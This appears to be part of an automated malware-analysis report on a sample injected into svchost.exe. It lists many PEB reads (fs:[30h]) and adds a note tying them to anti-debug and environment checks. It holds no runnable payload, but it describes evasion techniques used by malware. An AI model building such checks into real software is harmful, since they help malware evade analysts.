                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov ecx, dword ptr fs:[00000030h]1_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]1_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C4144 mov eax, dword ptr fs:[00000030h]1_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393208A mov eax, dword ptr fs:[00000030h]1_2_0393208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F60B8 mov eax, dword ptr fs:[00000030h]1_2_039F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F60B8 mov ecx, dword ptr fs:[00000030h]1_2_039F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039280A0 mov eax, dword ptr fs:[00000030h]1_2_039280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C80A8 mov eax, dword ptr fs:[00000030h]1_2_039C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B20DE mov eax, dword ptr fs:[00000030h]1_2_039B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C0F0 mov eax, dword ptr fs:[00000030h]1_2_0392C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039720F0 mov ecx, dword ptr fs:[00000030h]1_2_039720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0392A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039380E9 mov eax, dword ptr fs:[00000030h]1_2_039380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B60E0 mov eax, dword ptr fs:[00000030h]1_2_039B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]1_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]1_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]1_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E016 mov eax, dword ptr fs:[00000030h]1_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4000 mov ecx, dword ptr fs:[00000030h]1_2_039B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D2000 mov eax, dword ptr fs:[00000030h]1_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6030 mov eax, dword ptr fs:[00000030h]1_2_039C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A020 mov eax, dword ptr fs:[00000030h]1_2_0392A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C020 mov eax, dword ptr fs:[00000030h]1_2_0392C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932050 mov eax, dword ptr fs:[00000030h]1_2_03932050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6050 mov eax, dword ptr fs:[00000030h]1_2_039B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395C073 mov eax, dword ptr fs:[00000030h]1_2_0395C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D678E mov eax, dword ptr fs:[00000030h]1_2_039D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039307AF mov eax, dword ptr fs:[00000030h]1_2_039307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E47A0 mov eax, dword ptr fs:[00000030h]1_2_039E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393C7C0 mov eax, dword ptr fs:[00000030h]1_2_0393C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B07C3 mov eax, dword ptr fs:[00000030h]1_2_039B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039347FB mov eax, dword ptr fs:[00000030h]1_2_039347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039347FB mov eax, dword ptr fs:[00000030h]1_2_039347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039527ED mov eax, dword ptr fs:[00000030h]1_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039527ED mov eax, dword ptr fs:[00000030h]1_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039527ED mov eax, dword ptr fs:[00000030h]1_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE7E1 mov eax, dword ptr fs:[00000030h]1_2_039BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930710 mov eax, dword ptr fs:[00000030h]1_2_03930710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960710 mov eax, dword ptr fs:[00000030h]1_2_03960710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C700 mov eax, dword ptr fs:[00000030h]1_2_0396C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396273C mov eax, dword ptr fs:[00000030h]1_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396273C mov ecx, dword ptr fs:[00000030h]1_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396273C mov eax, dword ptr fs:[00000030h]1_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AC730 mov eax, dword ptr fs:[00000030h]1_2_039AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C720 mov eax, dword ptr fs:[00000030h]1_2_0396C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C720 mov eax, dword ptr fs:[00000030h]1_2_0396C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930750 mov eax, dword ptr fs:[00000030h]1_2_03930750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE75D mov eax, dword ptr fs:[00000030h]1_2_039BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972750 mov eax, dword ptr fs:[00000030h]1_2_03972750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972750 mov eax, dword ptr fs:[00000030h]1_2_03972750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4755 mov eax, dword ptr fs:[00000030h]1_2_039B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396674D mov esi, dword ptr fs:[00000030h]1_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396674D mov eax, dword ptr fs:[00000030h]1_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396674D mov eax, dword ptr fs:[00000030h]1_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938770 mov eax, dword ptr fs:[00000030h]1_2_03938770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934690 mov eax, dword ptr fs:[00000030h]1_2_03934690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934690 mov eax, dword ptr fs:[00000030h]1_2_03934690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039666B0 mov eax, dword ptr fs:[00000030h]1_2_039666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C6A6 mov eax, dword ptr fs:[00000030h]1_2_0396C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0396A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A6C7 mov eax, dword ptr fs:[00000030h]1_2_0396A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B06F1 mov eax, dword ptr fs:[00000030h]1_2_039B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B06F1 mov eax, dword ptr fs:[00000030h]1_2_039B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972619 mov eax, dword ptr fs:[00000030h]1_2_03972619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE609 mov eax, dword ptr fs:[00000030h]1_2_039AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E627 mov eax, dword ptr fs:[00000030h]1_2_0394E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03966620 mov eax, dword ptr fs:[00000030h]1_2_03966620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968620 mov eax, dword ptr fs:[00000030h]1_2_03968620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393262C mov eax, dword ptr fs:[00000030h]1_2_0393262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394C640 mov eax, dword ptr fs:[00000030h]1_2_0394C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03962674 mov eax, dword ptr fs:[00000030h]1_2_03962674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F866E mov eax, dword ptr fs:[00000030h]1_2_039F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F866E mov eax, dword ptr fs:[00000030h]1_2_039F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A660 mov eax, dword ptr fs:[00000030h]1_2_0396A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A660 mov eax, dword ptr fs:[00000030h]1_2_0396A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E59C mov eax, dword ptr fs:[00000030h]1_2_0396E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932582 mov eax, dword ptr fs:[00000030h]1_2_03932582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932582 mov ecx, dword ptr fs:[00000030h]1_2_03932582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03964588 mov eax, dword ptr fs:[00000030h]1_2_03964588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039545B1 mov eax, dword ptr fs:[00000030h]1_2_039545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039545B1 mov eax, dword ptr fs:[00000030h]1_2_039545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B05A7 mov eax, dword ptr fs:[00000030h]1_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B05A7 mov eax, dword ptr fs:[00000030h]1_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B05A7 mov eax, dword ptr fs:[00000030h]1_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039365D0 mov eax, dword ptr fs:[00000030h]1_2_039365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A5D0 mov eax, dword ptr fs:[00000030h]1_2_0396A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A5D0 mov eax, dword ptr fs:[00000030h]1_2_0396A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E5CF mov eax, dword ptr fs:[00000030h]1_2_0396E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E5CF mov eax, dword ptr fs:[00000030h]1_2_0396E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039325E0 mov eax, dword ptr fs:[00000030h]1_2_039325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C5ED mov eax, dword ptr fs:[00000030h]1_2_0396C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C5ED mov eax, dword ptr fs:[00000030h]1_2_0396C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6500 mov eax, dword ptr fs:[00000030h]1_2_039C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938550 mov eax, dword ptr fs:[00000030h]1_2_03938550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938550 mov eax, dword ptr fs:[00000030h]1_2_03938550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396656A mov eax, dword ptr fs:[00000030h]1_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396656A mov eax, dword ptr fs:[00000030h]1_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396656A mov eax, dword ptr fs:[00000030h]1_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EA49A mov eax, dword ptr fs:[00000030h]1_2_039EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039644B0 mov ecx, dword ptr fs:[00000030h]1_2_039644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BA4B0 mov eax, dword ptr fs:[00000030h]1_2_039BA4B0
Every row below is a read of fs:[30h] in the svchost.exe process the sample injected into. On 32-bit Windows that TEB slot holds the PEB pointer, and loading it is the first step of the usual anti-debug and environment checks (BeingDebugged at PEB+0x02, NtGlobalFlag at PEB+0x68, the loader module list through PEB+0x0C); a read of the pointer alone does not show which field the function goes on to test, so the functions with the most reads are the ones to open first in the process dump. All hits lie between 0x03928918 and 0x03A04B00, so resolve them against the injected code in the dump rather than against the svchost.exe binary on disk. Repeated reads inside one function are given as a count.
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039364AB | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039304E5 | mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03968402 | mov eax, dword ptr fs:[00000030h] (3 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0392E420 | mov eax, dword ptr fs:[00000030h] (3 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0392C427 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039B6420 | mov eax, dword ptr fs:[00000030h] (7 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039EA456 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0392645D | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0395245A | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396E443 | mov eax, dword ptr fs:[00000030h] (8 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0395A470 | mov eax, dword ptr fs:[00000030h] (3 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039BC460 | mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03940BBE | mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039E4BB0 | mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039DEBD0 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03950BCB | mov eax, dword ptr fs:[00000030h] (3 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03930BCD | mov eax, dword ptr fs:[00000030h] (3 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03938BF0 | mov eax, dword ptr fs:[00000030h] (3 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0395EBFC | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039BCBF0 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039AEB1D | mov eax, dword ptr fs:[00000030h] (9 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03A04B00 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0395EB20 | mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039F8B28 | mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03928B50 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039DEB50 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039E4B4B | mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039C6B40 | mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039FAB40 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039D8B42 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0392CB7E | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03A02B57 | mov eax, dword ptr fs:[00000030h] (4 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03968A90 | mov edx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0393EA80 | mov eax, dword ptr fs:[00000030h] (9 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03A04A80 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03938AA0 | mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03986AA4 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03930AD0 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03964AD0 | mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03986ACC | mov eax, dword ptr fs:[00000030h] (3 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396AAEE | mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039BCA11 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03954A35 | mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396CA24 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0395EA2E | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03936A50 | mov eax, dword ptr fs:[00000030h] (7 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03940A5B | mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039ACA72 | mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0396CA6F | mov eax, dword ptr fs:[00000030h] (3 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039DEA60 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039B89B3 | mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039B89B3 | mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039429A0 | mov eax, dword ptr fs:[00000030h] (13 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039309AD | mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0393A9D0 | mov eax, dword ptr fs:[00000030h] (6 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039649D0 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039FA9D3 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039C69C0 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039629F9 | mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039BE9E0 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039BC912 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03928918 | mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039AE908 | mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039B892A | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039C892B | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039B0946 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03A04940 | mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039D4978 | mov eax, dword ptr fs:[00000030h] (2 reads)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039BC97C | mov eax, dword ptr fs:[00000030h]
